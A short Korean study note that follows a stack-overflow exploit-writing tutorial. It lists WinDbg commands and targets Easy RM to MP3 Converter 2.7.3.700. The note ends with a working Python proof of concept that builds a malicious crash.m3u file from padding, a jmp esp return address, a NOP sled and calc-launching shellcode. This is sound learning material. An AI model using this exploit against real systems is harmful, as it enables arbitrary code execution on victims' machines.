윈도우 포너블 1차

Exploit writing tutorial part 1 : Stack Based Overflows

1. Windbg

https://www.technlg.net/windows/windbg-download/

2. Target

Easy RM to MP3 Converter 2.7.3.700

3. windbg

windbg -i : post-mortem 디버거로 등록

( post-mortem 디버거 해제 : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug [auto -> 0] )

g : go

p : single step

t  : step into

a : asm

k : call stack

du : (gdb) x/s

dc : (gdb) x/x

u : disasm

bp : break point

bl : bp list

bc : bp remove

ba : (gdb) watch

lm : view module list

gadget search : s 01b7000 L 01be1000 ff e4

jmp_esp = 0x01d2f23a
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
        "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
        "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
        "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
        "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
        "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
        "\x45\x81\x3e\x43\x72\x65\x61\x75"
        "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
        "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
        "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
        "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
        "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
        "\x6c\x63\x89\xe2\x52\x52\x53\x53"
        "\x53\x53\x53\x53\x52\x53\xff\xd7")
ex = open('crash.m3u','w')
payload = 'A' * 26064
payload += '\x3a\xf2\xd2\x01' + '\x90\x90\x90\x90' * 6
payload += shellcode
ex.write( payload )

shellcode -> x32 window calc universal shellcode

 

 

ex!!